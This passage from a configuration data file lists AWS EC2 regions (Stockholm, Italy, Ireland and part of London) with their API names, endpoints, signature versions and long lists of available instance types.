"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6a.12xlarge",
"c6a.16xlarge",
"c6a.24xlarge",
"c6a.2xlarge",
"c6a.32xlarge",
"c6a.48xlarge",
"c6a.4xlarge",
"c6a.8xlarge",
"c6a.large",
"c6a.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"f1.16xlarge",
"f1.2xlarge",
"f1.4xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6a.12xlarge",
"m6a.16xlarge",
"m6a.24xlarge",
"m6a.2xlarge",
"m6a.32xlarge",
"m6a.48xlarge",
"m6a.4xlarge",
"m6a.8xlarge",
"m6a.large",
"m6a.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-12tb1.112xlarge",
"u-3tb1.56xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"u-9tb1.112xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "4",
},
"eu-north-1": {
"api_name": "ec2_eu_north_stockholm",
"country": "Stockholm",
"endpoint": "ec2.eu-north-1.amazonaws.com",
"id": "eu-north-1",
"instance_types": [
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"hpc6a.48xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
],
"signature_version": "4",
},
"eu-south-1": {
"api_name": "ec2_eu_south",
"country": "Italy",
"endpoint": "ec2.eu-south-1.amazonaws.com",
"id": "eu-south-1",
"instance_types": [
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-3tb1.56xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
],
"signature_version": "4",
},
"eu-west-1": {
"api_name": "ec2_eu_west",
"country": "Ireland",
"endpoint": "ec2.eu-west-1.amazonaws.com",
"id": "eu-west-1",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6a.12xlarge",
"c6a.16xlarge",
"c6a.24xlarge",
"c6a.2xlarge",
"c6a.32xlarge",
"c6a.48xlarge",
"c6a.4xlarge",
"c6a.8xlarge",
"c6a.large",
"c6a.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"cc2.8xlarge",
"cr1.8xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"d3en.12xlarge",
"d3en.2xlarge",
"d3en.4xlarge",
"d3en.6xlarge",
"d3en.8xlarge",
"d3en.xlarge",
"f1.16xlarge",
"f1.2xlarge",
"f1.4xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"g5.12xlarge",
"g5.16xlarge",
"g5.24xlarge",
"g5.2xlarge",
"g5.48xlarge",
"g5.4xlarge",
"g5.8xlarge",
"g5.xlarge",
"h1.16xlarge",
"h1.2xlarge",
"h1.4xlarge",
"h1.8xlarge",
"hs1.8xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"i4i.16xlarge",
"i4i.2xlarge",
"i4i.32xlarge",
"i4i.4xlarge",
"i4i.8xlarge",
"i4i.large",
"i4i.xlarge",
"im4gn.16xlarge",
"im4gn.2xlarge",
"im4gn.4xlarge",
"im4gn.8xlarge",
"im4gn.large",
"im4gn.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"is4gen.2xlarge",
"is4gen.4xlarge",
"is4gen.8xlarge",
"is4gen.large",
"is4gen.medium",
"is4gen.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6a.12xlarge",
"m6a.16xlarge",
"m6a.24xlarge",
"m6a.2xlarge",
"m6a.32xlarge",
"m6a.48xlarge",
"m6a.4xlarge",
"m6a.8xlarge",
"m6a.large",
"m6a.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p3dn.24xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-12tb1.112xlarge",
"u-3tb1.56xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"u-9tb1.112xlarge",
"vt1.24xlarge",
"vt1.3xlarge",
"vt1.6xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2gd.12xlarge",
"x2gd.16xlarge",
"x2gd.2xlarge",
"x2gd.4xlarge",
"x2gd.8xlarge",
"x2gd.large",
"x2gd.medium",
"x2gd.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"x2iezn.12xlarge",
"x2iezn.2xlarge",
"x2iezn.4xlarge",
"x2iezn.6xlarge",
"x2iezn.8xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
"eu-west-2": {
"api_name": "ec2_eu_west_london",
"country": "United Kingdom",
"endpoint": "ec2.eu-west-2.amazonaws.com",
"id": "eu-west-2",
"instance_types": [
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"f1.2xlarge",
"f1.4xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i2.large",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
